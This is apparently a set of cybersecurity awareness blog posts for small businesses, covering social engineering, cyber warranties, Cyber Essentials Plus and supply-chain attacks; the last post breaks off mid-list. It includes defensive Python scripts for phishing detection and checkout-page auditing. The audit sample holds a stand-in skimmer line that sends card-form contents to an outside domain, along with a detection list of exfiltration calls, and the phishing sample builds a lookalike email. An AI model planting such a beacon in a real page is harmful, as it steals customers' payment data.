Social engineering unmasked: guarding against psychological hacks


October is Cyber Security Awareness Month, so we’re focusing on a frequently seen threat: social engineering. During my time as a Detective Sergeant leading the Dorset Police Cyber Crime Team, social engineering attacks became one of the most common offences. So, based on my experience, let’s look at what they are, how they work, and what you can do to guard against them.

What is social engineering and why should I care?

Social engineering involves an attacker using various methods to manipulate a person into doing what the attacker wants them to do. Social engineers leverage key principles to successfully achieve their aim. These principles include:

  • Authority – This relies on the fact that most people will take instruction from someone who appears to be in charge
  • Intimidation – Scaring or bullying an individual
  • Consensus – People will often want to do what others are doing
  • Scarcity – Making something appear more desirable because it may be the last one
  • Familiarity – The recipient likes the individual or organisation the social engineer is claiming to be
  • Trust – The Social engineer builds a relationship with the target
  • Urgency – Creating the feeling that action must be taken immediately

Each of these principles triggers an emotional response in the recipient, and that is what the attacker relies on. When we react emotionally, we are not thinking clearly.

Social engineering is the cyber criminal’s go-to tool for achieving their aims, whether that is stealing data, money or your identity. The final victim may not even be the person who is socially engineered; it could be their employer or a loved one.

The impacts of this can be significant, whether it is a big financial loss, reputational damage or even the psychological stress caused. In a worst-case scenario, this could lead to a business closing down or an individual coming to harm.


How big a problem is social engineering? 

The stats don’t lie! Social engineering is a significant problem.

According to the UK Cyber Security Breaches Survey 2023, phishing (a form of social engineering) is by far the most common type of cyber attack: of the businesses and charities that identified an attack in the previous 12 months, 79% and 83% respectively reported phishing. Other industry figures put the average organisation at more than 700 social engineering attacks a year, and one widely quoted estimate is that around 98% of cyber attacks involve some form of social engineering. The methodologies behind these figures differ, so treat the exact percentages with caution; the overall picture is not in doubt.

Nor is the problem confined to the well-heeled. Social engineering attacks are 350% more common for employees of small businesses than at larger enterprises.

What are the most common types of Social Engineering?

There are many types of social engineering, including phishing, pretexting, tailgating, baiting, watering hole attacks and more. Understanding the forms it takes will help you defend against them.

Phishing

The most widely recognised form of social engineering is Phishing. Phishing is most commonly launched via email but can be conducted through SMS (Smishing) or a phone call (Vishing). 

A phishing email lands in your inbox and, on the surface, looks genuine: it copies the branding, tone and sender name of an organisation you deal with. In reality it comes from an attacker and carries a malicious attachment or link. An attachment may install malware that gives the attacker a foothold on your computer; a link typically leads to a spoof login page that mimics the real one, so that the username and password you type are captured by the attacker. Always check where a link actually points (hover over it on a computer, or long-press it on a phone) rather than trusting the visible text, and reach the site by typing the address you already know.
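The indicators described above can be checked mechanically. The script below is an added example, not code from the original article: using only the Python standard library, it parses a constructed message and flags a link whose visible text names a different domain from the one its href points to, a Reply-To header that routes replies to another domain (common in emails claiming to be from the help desk), and attachment types that can run code. The domains (corp.example and the lookalikes) and the extension list are assumptions for the demo.

```python
"""Flag common phishing indicators in an email message.

Added example, not code from the original article; standard library only.
The sample messages are constructed. Checks: a link whose visible text names
a domain the href does not belong to, a Reply-To on a different domain from
the From address, and attachment types that can execute code.
"""
import email
import email.utils
import re
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Extensions that run code when opened (assumption: tune to your environment).
RISKY_EXTENSIONS = {".exe", ".js", ".vbs", ".scr", ".hta", ".docm", ".xlsm", ".iso", ".lnk"}
# Anything that looks like a hostname inside the visible link text.
DOMAIN_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b", re.I)


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _domain_of(header) -> str:
    """Lower-cased domain of the first address in a header ('' if none)."""
    addr = email.utils.parseaddr(str(header))[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def link_mismatches(html: str):
    """(claimed_domain, real_host) pairs where the link text misrepresents the target."""
    parser = _LinkCollector()
    parser.feed(html)
    found = []
    for href, text in parser.links:
        host = (urlparse(href).hostname or "").lower()
        for claimed in (c.lower() for c in DOMAIN_RE.findall(text)):
            # Strict suffix match: corp.example.login-reset.test is NOT corp.example.
            if host != claimed and not host.endswith("." + claimed):
                found.append((claimed, host))
    return found


def analyse(raw_message: str) -> dict:
    """Run the three checks over a raw RFC 5322 message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    html_part = msg.get_body(preferencelist=("html",))
    from_domain = _domain_of(msg.get("From", ""))
    reply_domain = _domain_of(msg.get("Reply-To", ""))
    risky = [
        part.get_filename() for part in msg.iter_attachments()
        if (part.get_filename() or "").lower().endswith(tuple(RISKY_EXTENSIONS))
    ]
    return {
        "link_mismatches": link_mismatches(html_part.get_content() if html_part else ""),
        "reply_to_mismatch": bool(reply_domain) and reply_domain != from_domain,
        "risky_attachments": risky,
    }


def sample_phishing_email() -> str:
    """Constructed: an 'IT help desk' pretext with a lookalike link and an .exe attached."""
    msg = EmailMessage()
    msg["From"] = "IT Help Desk <helpdesk@corp.example>"
    msg["Reply-To"] = "support@corp-example-login.test"
    msg["To"] = "alice@corp.example"
    msg["Subject"] = "URGENT: your mailbox will be suspended in 24 hours"
    msg.set_content("Please view this message in an HTML-capable client.")
    msg.add_alternative('<p>Your password expires today. Verify now at <a href='
                        '"http://corp.example.login-reset.test/verify">https://corp.example/reset</a>'
                        " or complete the attached form.</p>", subtype="html")
    msg.add_attachment(b"MZ\x90\x00", maintype="application", subtype="octet-stream",
                       filename="PasswordForm.exe")
    return msg.as_string()


def sample_legitimate_email() -> str:
    """Constructed benign message: link text and href agree, no Reply-To, no attachment."""
    msg = EmailMessage()
    msg["From"] = "Alice <alice@corp.example>"
    msg["To"] = "bob@corp.example"
    msg["Subject"] = "Minutes from today"
    msg.set_content("Minutes are on the intranet.")
    msg.add_alternative('<p>Minutes: <a href="https://intranet.corp.example/minutes">'
                        "intranet.corp.example</a></p>", subtype="html")
    return msg.as_string()


if __name__ == "__main__":
    print("phishing:  ", analyse(sample_phishing_email()))
    print("legitimate:", analyse(sample_legitimate_email()))
```

The domain comparison is deliberately a strict suffix match, so that a host such as corp.example.login-reset.test is reported even though it contains the genuine domain; that is exactly the trick the spoof pages described above rely on. A production mail gateway does the same kind of comparison with a proper public-suffix list and URL unwrapping, but the logic is no different.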

Pretexting

Pretexting is another commonly used social engineering technique. In this attack, the social engineer will use a fictional scenario to justify why they are contacting you. Once contact has been made, the social engineer will try to obtain information from you.

For example, the attacker could pose as the IT help desk, calling you to help with a reported issue with your computer, gaining your trust and offering to connect to your computer to quickly resolve the problem remotely. If successful, the attacker could then exploit this access to your computer.

Tailgating

Tailgating is slightly different. These attacks aim at physical, rather than digital, entry into your business. Typically, the social engineer follows you as you open and walk through a secured entrance, gaining access along with you.

This is a scenario we have all faced. You use your keycard to open the office door; as you walk through, someone hurries up behind you and you feel obliged to hold the door for them. Or you see someone approaching the door carrying a heavy box. It sounds like something we would never fall for, but our instinct to help someone in a situation we have all been in prompts us to hold that door open. The fix is simple but uncomfortable: let the door close, ask them to use their own pass, and challenge (or report) anyone in the building without a visible one.

Social engineering in the real world: a dating disaster 

Having worked in law enforcement for 15 years, I have investigated hundreds of crimes. 

One case I investigated was the takeover of a business and subsequent fraudulent transactions over 48 hours. This all started with social engineering. 

In this case, a business owner had signed up for a dating website. The business owner began chatting to someone via instant messages on the site; there was nothing unusual about this. The conversation was going well, and the pair discussed their likes and dislikes. The conversation moved to star signs, and the victim revealed their date and place of birth. Again, this was all within the context of the conversation and appeared quite normal. However, things were not as they seemed.

Romance turns to horror 

Unbeknownst to the victim, the social engineer had struck gold. A quick Google search of the victim’s name revealed his business website, including his mobile phone number.

This information was used to contact his mobile phone provider and port his mobile number to the social engineer’s SIM card. The victim’s phone was no longer receiving text messages or calls, as they were being sent to a phone that the social engineer controlled.

But it didn’t stop there. Using the victim’s personal details and phone number, the social engineer proceeded to take control of the business’s website and email address, ultimately taking out a loan in the business owner’s name. Within 48 hours the victim had lost control of his business and owed the bank thousands of pounds. He only realised something was up when he couldn’t use his phone.

Fortunately, he was able to recover his phone number and some of the money was recovered. However, this took weeks to rectify and the time, stress and effort he put into getting back to square one is not to be overlooked.

How to recognise social engineering attacks

We are all very busy, and the digital world is always available to us, whether we are sitting at our desks or in the back of a taxi using our phones. The next meeting or deadline is always within touching distance. Because of this, we may not always give our full attention to how we respond to the many interactions we have in a day.

Here are three strategies that help you recognise social engineering attacks:

1. Trust Your Instincts

If something feels off or too good to be true, it probably is. Trust your gut feelings when you encounter suspicious requests or situations. 

2. Be wary of your emotions

Social engineers want to trigger an emotional response to encourage you to make a quick decision. Take a step back and consider whether the situation truly requires immediate action.

3. Verify unusual requests

If you receive an unusual request, such as transferring money, providing access to a building, or sharing sensitive data, independently verify it through a trusted and known communication channel. Do not use the phone number, email address or link supplied in the request itself; look the contact details up yourself and call back.

How to protect yourself

The threat will always be there and, as we have seen, it can take many forms. Here are three simple measures that we can put in place, both at work and in our personal lives, to help counteract it.

Use MFA

Whenever possible, enable multi-factor authentication (MFA) on your accounts. Even if an attacker obtains your password, they cannot sign in without the second factor. Prefer an authenticator app or a hardware security key over codes sent by SMS: as the case study above shows, once a phone number has been ported to the attacker’s SIM, SMS codes go to the attacker too.

Don’t share too much on social media

Be cautious about sharing personal information on social media platforms. As we saw in the case study, attackers will use information gleaned to craft convincing social engineering attacks.

Education and training

Regular security awareness training for everyone is vital. Proofpoint found that only 56% of organisations with a security awareness programme train their entire workforce. Just as we lock every door and window at night rather than most of them, we should train everybody, so that common social engineering tactics are recognised and stopped before they cause harm. Simulated phishing exercises, in which staff receive harmless test emails, are a useful way to check whether the training is working.


Cyber insurance vs. cyber warranties: What’s the difference?


Cyber insurance is one of the fastest-growing industries on the planet. Even relatively conservative estimates predict the industry will be worth close to $85 billion by 2030. However, the cyber insurance industry has had its challenges, most notably rising premiums and a growing threat landscape, leading to other products popping up alongside it.

One such product is cyber warranties. But what is a cyber warranty? And how does it differ from cyber insurance? 

What is a cyber warranty? 

We’ll keep this brief. In simple terms, a cyber warranty is a guarantee from a vendor that it will cover customers’ costs in the event of a breach, provided a set of criteria is met.

Typically, cyber warranties come in two forms:

1) A vendor guarantees that their product or service will remain secure against cyber threats. If a breach occurs due to a vulnerability in the vendor’s product, they must cover costs related to investigation, notification and recovery.

For customers, this provides a guarantee that the provider takes security seriously and regularly reviews and patches their software. Meanwhile, for the vendor, it acts as a way to differentiate themselves from competitors and gain customers’ trust.

2) A vendor guarantees against a set of cybersecurity controls or practices. To illustrate, let’s say a vendor decided to do this using the Cyber Essentials controls. Provided the purchaser of the warranty can prove that all five controls were in place at the time of the breach, the vendor would be required to cover the costs associated with recovering from the attack. 

This approach has the advantage of encouraging customers to be proactive in adopting security best practices, as well as offering them protection from threats.


How does cyber insurance differ vs. cyber warranties?

After reading this far, you may well be wondering what the difference between warranties and insurance is. After all, both shield organisations from the costs associated with a successful cyber attack. So why does the cybersecurity sector have space for both?

Despite the similarities, once you delve a little deeper, it becomes clear that cyber insurance and cyber warranties have a few key differences:

  • Cyber insurance typically offers more comprehensive protection, while warranties cover a limited set of risks
  • Insurance offers the option of both first-party and third-party cover (claims made by someone other than the policyholder). Warranties are limited to first-party incidents only
  • Insurance is a financially regulated product, whereas warranties fall under consumer protection law
  • Insurance policies can, in some cases, be customised with optional covers, whereas warranties tend to be more standardised
  • Obtaining insurance is often subject to a detailed application process so that the underwriter can fully assess the risk; warranties often have a far simpler process that requires only agreeing to the product or service terms and conditions

Is the best approach to use both?

Given the differences between them, is the most comprehensive approach to risk management to take out both a cyber warranty and cyber insurance?

In short, yes. But let’s dig a little further into why. 

Cyber warranties have several perfect use cases, for example: 

  • You’ve just purchased a cybersecurity tool or software and the vendor offers a warranty alongside it
  • You want to cover a limited set of cyber risks that are either tied to a specific product or set of controls
  • You’re considering cyber insurance but want some protection in the meantime. In this case, the second type of warranty mentioned above is perfectly suited

However, cyber warranties’ use cases aren’t endless. And, this is where cyber insurance steps in. For comprehensive cover, customisation and a wider range of recovery services attached, cyber insurance is the best bet. 

But that’s not to say the two don’t work well in concert. Here are just a few examples of scenarios where it’s beneficial to use both: 

  • You want to cover against a specific set of cyber risks (for example those associated with a product) but still want general protection
  • You’re using warrantied software or products but need a higher coverage limit than the warranty allows for
  • You want to use a warranty to cover you against some basic risks and insurance for the more complex ones

These are just a few examples of how warranties and insurance can work well together, we could list plenty more. In fact, it’s plausible some combination of the two could become the norm for most businesses in the next few years.

Forward-thinking insurance providers are beginning to offer bundled cyber insurance and warranty solutions tailored to SMBs. With the number of threats to small businesses only growing, it’s increasingly likely this will become the standard in cyber risk transfer as the decade progresses.


Is Cyber Essentials Plus right for my business?


Are you considering Cyber Essentials Plus, but unsure whether it’s right for your business? To help you decide, we’ve pulled together a quick summary of how the government-backed certification works, and why it could be the next step for your business. Read on to find out more.

What is Cyber Essentials Plus?

Cyber Essentials Plus follows the same simple approach and offers the same benefits as Cyber Essentials. It differs in one key aspect: Cyber Essentials Plus adds a hands-on technical audit of your systems by an assessor. The controls are the same; the audit verifies that they are actually in place and properly configured, rather than relying on your own answers.

The audit process takes a little more effort than the standard certification, but it’s worth it for the peace of mind that your security is up to standard.

When should you consider Cyber Essentials Plus?

The truth is, any business looking to improve its security could benefit from Cyber Essentials Plus. However, there are a few scenarios in which we’d particularly recommend it.


1. You want a thorough assessment of your cybersecurity credentials 

Cyber Essentials is a great first step for any small business that wants to up its cybersecurity game. Nevertheless, the standard Cyber Essentials certification is self-assessed. This means that while you’ll have to comply with the security controls it lays out to pass, you won’t benefit from an independent assessment.

Cyber Essentials Plus, on the other hand, features a visit (either in person or remotely) from an independent auditor. So you’ll gain the peace of mind that your security credentials are up to scratch.

2. You want to work with high-value customers 

It’s a general rule of thumb that the more prestigious the clients you work with, the more stringent their security requirements. Cyber Essentials Plus can help demonstrate to potential customers with high expectations that you take data protection and cybersecurity seriously. And, it could help you steal a march on competitors.

3. You’re a public-facing business 

Any business that directly interacts with the public should make cybersecurity a top priority. If your business stores personal data, whether that’s contact details or financial information, it’s part of your duty of care to protect it.

Investing in Cyber Essentials Plus will not only help you put in place the measures needed to better protect your organisation, but it also demonstrates to customers that you take security – and their personal data – seriously. 

4. You work in a sector that requires higher-than-standard security

Some industries are more at risk from cyberattacks than others. For example, manufacturing firms were the victims in almost a quarter (24.9%) of all breaches globally in 2022, closely followed by finance and insurance with nearly a fifth (18.9%).

If your business works in a high-risk sector, it’s natural that you need better protection. Again, the standard certification is a great stepping stone, but the extra assessment and validation provided by Cyber Essentials Plus is key if you’re more likely to be targeted. 

What’s more, many businesses working in high-risk industries will require partners and suppliers to demonstrate better-than-basic credentials and Cyber Essentials Plus fulfils this function.

5. You want to access government funding or bid for tenders

Although Cyber Essentials Plus isn’t mandatory for all government funding and contracts yet, there are plenty of scenarios where you’ll need it. For instance, schools and colleges hoping to secure ESFA Education and Skills contracts are required to have passed Cyber Essentials and be working towards Cyber Essentials Plus.

Likewise, many healthcare and defence tenders mandate that applicants have at least the standard certification in place, if not Cyber Essentials Plus. There’s also a case for investing in Cyber Essentials Plus even if the contract doesn’t require it. In a competitive tendering process, being able to demonstrate better security bona fides than your rivals could help tip the balance in your favour.


How to encourage continuous security improvement in your supply chain


Managing and monitoring cybersecurity across an entire supply chain is a challenging task. This is especially true if you’re an SME. However, knowledge and prevention strategies can greatly reduce the risk of a successful supply-chain attack. And, this can be extended to the suppliers and third parties in your supply chain.

Ultimately, the best way to improve your cybersecurity is to create a cohesive, collaborative environment that helps drive continuous security improvement internally and across your supply chain. We’ll explore how to do exactly that in this blog.

Why worry about supply chain attacks?

Supply chain attacks are nothing new but, now more than ever, businesses are accelerating their efforts to prevent them. The National Cyber Security Centre (NCSC) issued new guidance following the recent rise in supply chain attacks, noting that only around one in ten businesses review the risks posed by their immediate suppliers. Spending is catching up: 44% of organisations say they will substantially increase their year-over-year spending on supply chain cybersecurity in the coming year.

So there’s never been a better time to work with your suppliers to identify risks and ensure appropriate security measures are in place. To help you out, here are five simple steps.

5 steps to encourage continuous security improvement for supply chains

1. Understand the basics of cybersecurity

Begin by looking at your organisation. In today’s digital world, the bare minimum of cybersecurity isn’t enough. SMEs are often limited by knowledge and budget, but luckily, there are many accessible solutions to help improve your cybersecurity credentials. Government-backed schemes like Cyber Essentials require you to meet specific cybersecurity standards. By achieving accreditation, you’ll ensure you’re covering the basics. And, with this knowledge, you’re better prepared to assess your supply chain. 


2. Conduct a risk assessment 

Your supply chain might be extensive with many moving parts and people. Equally, it could be very small. No matter the size, take the time to conduct a thorough cybersecurity risk assessment of your supply chain. This might be asking suppliers whether they have cybersecurity accreditations, such as a Cyber Essentials certification, that help them stay secure and compliant. 

Look for specific risk factors in your supply chain. For example, a payment processing provider is exposed to skimming attacks on checkout pages. Ask what measures the provider has in place to prevent and detect them. It has happened to established and seemingly secure businesses, so it could happen to your providers.

3. Define contractual agreements

If you want to ensure everyone you work with takes cybersecurity seriously, the simplest step is to write cybersecurity requirements into your contracts with third parties and suppliers. This will allow you to define your expectations for cybersecurity and procedures for communicating and reporting incidents – making everybody safer in the process.

4. Encourage cybersecurity training

Certifications and contractual agreements can’t totally override human error. You already know your employees should receive cybersecurity training, but do your supply chain contacts also offer it to their employees? Consider making your partners aware of platforms to enhance employees’ cybersecurity training. While this is ultimately your suppliers’ responsibility, open communication about what’s available is beneficial and shows you prioritise cybersecurity.

5. Collaborate and share intelligence

Staying up to date with the latest cybersecurity news is a great method of staying aware of potential risks. Not all SMEs will have dedicated cybersecurity professionals to hand, so following news sources or trusted cybersecurity blogs can help you keep your knowledge up to date. 

It’s wise to share your findings with partners in your supply chain. This might be through a monthly email chain, communication channel like Microsoft Teams, or within your regular meetings. Open communication is key to improving collaboration with your supply chain and demonstrates a desire for a unified effort towards increased cybersecurity. 

Conclusion

The importance of supply chain cybersecurity can’t be overstated in today’s landscape. Ian McCormack, Deputy Director for Government Cyber Resilience at the National Cyber Security Centre, emphasised this in a recent statement:

“Supply chain attacks are a major cyber threat facing organisations and incidents can have a profound, long-lasting impact on businesses and customers. With incidents on the rise, it is vital organisations work with their suppliers to identify supply chain risks and ensure appropriate security measures are in place.”

Luckily, the road to improved and continuous supply chain security isn’t complex. By taking simple measures, such as a cybersecurity certification and collaborating closely with suppliers, your business will become more secure.


What SMEs must know about supply-chain attacks


If a thief wants to enter a house, it’s unlikely they’ll choose to ring the doorbell. They’re going to climb through a half-opened window around the back. And if they’re careful enough, the homeowner is none the wiser.

The same principle applies in cybersecurity. Supply chain attacks have existed for some time and are a well-known way of reaching seemingly secure businesses through the less secure suppliers and software they depend on. Gartner predicts that by 2025, 45% of organisations globally will have experienced an attack on their software supply chain. Here’s how they work and what you need to know about them.

What is a supply chain attack?

A supply chain attack is one in which a cyber criminal compromises a supplier, product, service or software component that the target trusts, and then uses that trusted relationship to reach the target. Many businesses today are cybersecurity-savvy. The best prepared will have well-intentioned cybersecurity policies and controls in place to manage their security and keep problems at bay.

But most businesses don’t operate within silos. Your organisation probably relies on other businesses as part of your supply chain, or you form a part of another supply chain. This creates complexity when managing security credentials. Can you be assured that every business within your supply chain, from a payment processing provider to a manufacturer, is completely secure? 

Most organisations will manage compliance across their people, software, and processes, but this is difficult to extend to other points in the supply chain. This is the exact vulnerability criminals can exploit. 


Examples of supply chain attacks

1. SolarWinds

No supply chain attack discussion can ignore SolarWinds. SolarWinds is a major software company that specialises in network and infrastructure monitoring tools. In 2019, threat actors gained unauthorised access to SolarWinds’ network and, over the following months, inserted a backdoor (later named SUNBURST) into the build of its Orion platform. During 2020, SolarWinds unknowingly shipped the backdoored code to customers through its normal, digitally signed software updates, installing malware on customer systems that the attackers could use for espionage. Up to 18,000 customers installed the tainted updates, from small businesses to US government agencies. Because the updates were genuinely signed by the vendor, ordinary update checks did not catch them; that is what makes this class of attack so dangerous.

2. Target 

Known as one of the earlier supply chain attacks, the 2013 breach of Target, a U.S. retailer, started with a third party: attackers stole the network credentials of a heating and air-conditioning contractor that had remote access to Target’s systems, moved from there into the retail network and installed malware on point of sale (POS) systems. The malware captured around 40 million customers’ credit and debit card details. The breach has since cost the business nearly $300 million.

3. British Airways

In 2018, British Airways was unknowingly hit by malicious JavaScript injected into its website. The script harvested the payment details customers typed into the payment page and sent them to an attacker-controlled domain. This is known as skimming: payment data is collected, without the customer or the merchant noticing, during the online checkout process. The Magecart group is believed to have been responsible, and approximately 380,000 customers had their personal and financial data stolen. The lesson for anyone running a checkout page is that every script that loads on that page, including third-party libraries, has full access to whatever the customer types.
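The question raised elsewhere on this page, whether a payment provider has measures against skimming, can be turned into a concrete check. The script below is an added example, not code from the article and not related to British Airways’ actual site: it inventories the scripts on a constructed checkout page, flags third-party scripts loaded without Subresource Integrity (SRI), inline scripts that make network calls, and forms that post to another origin, and then proposes a Content-Security-Policy that pins scripts and outbound connections to the hosts found. The first-party domain shop.example, the sample HTML and the list of suspicious calls are assumptions for the demo.

```python
"""Inventory the scripts on a checkout page and flag places a skimmer could hide.

Added example, not code from the article. Standard library only. The page HTML
is constructed; the first-party domain and the list of exfiltration calls are
assumptions for the demo.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

FIRST_PARTY = "shop.example"  # assumption: the merchant's own domain
# JavaScript calls a skimmer needs in order to send captured data elsewhere.
EXFIL_CALLS = ("XMLHttpRequest", "fetch(", "sendBeacon", "new Image")


class _PageAudit(HTMLParser):
    """Collect every <script> (external or inline) and every <form action>."""

    def __init__(self):
        super().__init__()
        self.scripts = []        # dicts: src, integrity, inline source text
        self.form_actions = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            self.scripts.append({"src": a.get("src"), "integrity": a.get("integrity"), "inline": ""})
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])

    def handle_data(self, data):
        if self._in_script and self.scripts[-1]["src"] is None:
            self.scripts[-1]["inline"] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def _is_third_party(url, first_party):
    host = urlparse(url).hostname
    return bool(host) and host != first_party and not host.endswith("." + first_party)


def audit_page(html, first_party=FIRST_PARTY):
    """Return (findings, sorted third-party script hosts) for a page's HTML."""
    p = _PageAudit()
    p.feed(html)
    findings, hosts = [], set()
    for s in p.scripts:
        if s["src"] is None:
            if any(call in s["inline"] for call in EXFIL_CALLS):
                findings.append(("inline script makes network calls", s["inline"].strip()[:60]))
        elif _is_third_party(s["src"], first_party):
            hosts.add(urlparse(s["src"]).hostname)
            if not s["integrity"]:  # without SRI, a modified copy on the CDN loads silently
                findings.append(("third-party script without SRI", s["src"]))
    for action in p.form_actions:
        if _is_third_party(action, first_party):
            findings.append(("form posts to another origin", action))
    return findings, sorted(hosts)


def suggested_csp(hosts):
    """A Content-Security-Policy restricting scripts and outbound connections to the audited hosts."""
    allowed = " ".join(["'self'"] + [f"https://{h}" for h in hosts])
    return (f"default-src 'self'; script-src {allowed}; connect-src {allowed}; "
            f"img-src 'self'; form-action 'self'")


# Constructed sample page (not a real merchant). The inline script is a stand-in
# for a skimmer: on submit it beacons the form contents to another domain.
SAMPLE_CHECKOUT_HTML = """<html><head>
<script src="/static/checkout.js"></script>
<script src="https://cdn.payments-provider.test/v2/sdk.js"
        integrity="sha384-constructedPlaceholderDigest" crossorigin="anonymous"></script>
<script src="https://static.analytics-vendor.test/widget.js"></script>
</head><body>
<form action="/pay" method="post"><input name="card"><input name="cvv"></form>
<script>
  document.forms[0].onsubmit = function () {
    new Image().src = "https://collector.test/c?d=" + encodeURIComponent(document.forms[0].innerHTML);
  };
</script>
</body></html>"""

if __name__ == "__main__":
    found, third = audit_page(SAMPLE_CHECKOUT_HTML)
    for kind, detail in found:
        print(f"{kind}: {detail}")
    print(suggested_csp(third))
```

On the sample page the audit reports the analytics script (loaded from a third party with no integrity hash, so a tampered copy would load unnoticed) and the inline script that beacons the form to collector.test. The suggested policy would block both: img-src and connect-src stop the beacon reaching an unlisted domain, and script-src without 'unsafe-inline' refuses the inline script altogether, so any legitimate inline code would need to be given a nonce. Run the audit against the live checkout page on a schedule; a new third-party host appearing in the output is exactly the change a skimming attack introduces.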

SMEs and supply chain attacks

Cybercriminals target large organisations due to the sheer volume of data they can exploit. But small and medium businesses are equally susceptible targets.

More than half (54%) of all UK-based SMEs experienced some form of cyber attack in 2022. Cybercriminals know that SMEs are often less well defended, and because SMEs are frequently part of a larger supply chain, compromising one can be a stepping stone to a bigger target.

How to protect your SME from supply chain attacks

Manage your cybersecurity first

Consider your own cybersecurity status first. A baseline certification, such as Cyber Essentials, covers the fundamental controls every business should have in place to protect itself from common attacks. Certification is credited with mitigating up to 98.5% of common, internet-based threats, and working through it prompts important steps such as staff training and long-term cybersecurity support.

Check your suppliers

Ask your suppliers for evidence of how they manage cybersecurity. For lower-risk suppliers, a baseline certification may be all the assurance you need. Higher-risk suppliers, such as those with access to your systems or sensitive data, should have proportionately stronger measures in place. If they can’t show this, it should ring alarm bells.

You should collaborate with every business in your supply chain, and the supply chains you are within, to emphasise the importance of cybersecurity credentials. You can even make cybersecurity part of your contractual agreements, so there’s less chance of a vulnerability in your supply chain.

Implement an early warning system

A supply chain early warning system (EWS) uses data rather than human knowledge alone to spot security threats in your supply chain: for example, continuous monitoring of suppliers’ public-facing systems, breach and vulnerability notifications, and threat intelligence feeds, with alerts sent to an administrator together with suggested mitigations. As attacks become more complex, it is a useful way of covering types of attack you may not have encountered before. Treat it as a complement to the contractual and collaborative measures above, not a replacement for them.

A supply chain attack could happen to you

But it doesn’t have to be that way. By ensuring your organisation is as secure as possible, and obligating your suppliers to do the same, you’re more likely to deter and mitigate the risk of a supply chain attack against your SME. This way, your business’s figurative back windows are firmly locked, so no burglars can get in – through the front door or the back.


5 steps to better supply chain security


It’s not an exaggeration to say that supply chains pose one of the greatest cybersecurity risks to any business. In recent years, there’s been a huge increase in attacks stemming from supply-chain vulnerabilities. According to IBM’s 2023 X-Force Threat Intelligence Index, more than half of security breaches are attributed to supply chain and third-party suppliers, at a high average cost of over $4 million. 

It’s a serious problem. And, like most small businesses, you’re probably asking what you can do about it. After all, looking after your own cybersecurity is tricky enough; how on earth do you start addressing gaps in your suppliers’ defences? 

To help you get started, we’ve put together 5 supply chain security best practices to strengthen your digital defences.


1. Protect your own business first 

This almost goes without saying, but before you delve into your supply chain, it’s worth considering your own cybersecurity status first. Is your business Cyber Essentials certified? Do you have security controls in place? Do you provide regular training for staff on cyber threats and best practices?

If you’ve answered no to any of the above, then these are great first steps in securing your business. And there’s a bonus to taking these measures first. By reviewing your own security, you’ll get a good idea of your business’s crown jewels – those critical aspects of your organisation that need the strongest protection.

2. Talk to your suppliers 

Progress begins with dialogue. So talk to your suppliers and partners about their cybersecurity. You may find that your business faces many of the same difficulties and threats. 

This can help you work together to ensure everyone in your supply chain works to the same security standards. And keeping dialogue open makes it much more likely that suppliers and partners will let you know faster if something goes wrong – protecting your business in the long run.

3. Make cybersecurity part of your contractual agreements 

Behavioural change often requires incentives. Once you’ve established what good cybersecurity looks like for your business, apply those principles to your partner and supplier contracts. 

How these agreements look will depend on your organisation. Requiring partners to hold a current Cyber Essentials certification will be enough for some businesses. Others may need something more comprehensive, such as ISO 27001 certification.

The important thing is that you make good cyber hygiene an expectation (rather than a nice to have) for anyone working with your business. By doing so, you not only incentivise good cybersecurity behaviours across your supply chain but also protect your business. 

4. Keep improving

Building a strong cybersecurity culture across your network takes time. It requires trust between businesses, and you can’t build that overnight. So persevere if your supply chain doesn’t immediately transform from leaky to locked down.

Cybersecurity is all about learning. As cyber threats evolve, so too do the methods for thwarting them. Stay updated with new threats and tweak and adapt your practices accordingly. You can then use this knowledge to update partners and suppliers and strengthen your supply chain.

5. Follow the NCSC’s new guidance 

Finally, if you’re looking for a framework to tie everything together, you could do a lot worse than the National Cyber Security Centre’s (NCSC) supply chain cybersecurity guidance.

The NCSC’s guidance breaks tackling supply chain security down into five basic steps (in case you were wondering where we got the idea from):

  1. Understand why your organisation should care about supply chain cybersecurity
  2. Develop an approach to assess supply chain cybersecurity
  3. Apply the approach to new supplier relationships
  4. Integrate the approach into existing supplier contracts
  5. Continuously improve

It’s a great place to start if you’re serious about tackling cybersecurity across your supply chain.

It’s a journey, not a destination

And remember, securing your supply chain is an ongoing process, but starting now is one of the biggest single investments you can make in protecting your business. Want to know more? Check out our new guide to protecting your business.


4 reasons why hackers attack the supply chain


You’re a hacker ready to launch an attack. What do you target? 

  • A: A single person or company that’ll get you a sizeable reward, if the attack is successful?
  • B: A supply chain that could get you access to hundreds, if not thousands, of companies and their data, if the attack is successful?

Supply chain attacks increased 633%, by 88,000 instances, in 2022. And it’s easy to see why.

With this increased risk, it’s good to understand what supply chain hacks are, why they happen, and how to protect your business from them as much as possible. 

What are supply chain hacks?

A supply chain hack is a type of cyberattack that targets organisations by exploiting weak links in third-party software, hardware, or services. In these cases, you could have very strong cybersecurity defences but suffer an attack because a supplier’s software has a vulnerability they weren’t aware of. Hackers use this to access your networks and data undetected and cause damage. 

Because these attacks are through legitimate supplier software/hardware, they can be more difficult to spot and stop. In the high-profile SolarWinds attack, it took months for professionals to understand how cyber criminals were gaining unauthorised access to networks and data.  

Why hackers attack supply chains

1. Collateral damage

By accessing a company that provides software or services to other companies, hackers can harm multiple targets in one hit. Instead of putting effort into attacking one company, they could potentially impact hundreds, if not thousands. Take the recent Okta attack as an example. Okta has 14,000 customers, and in one five-day attack, hackers impacted 366 of them. 

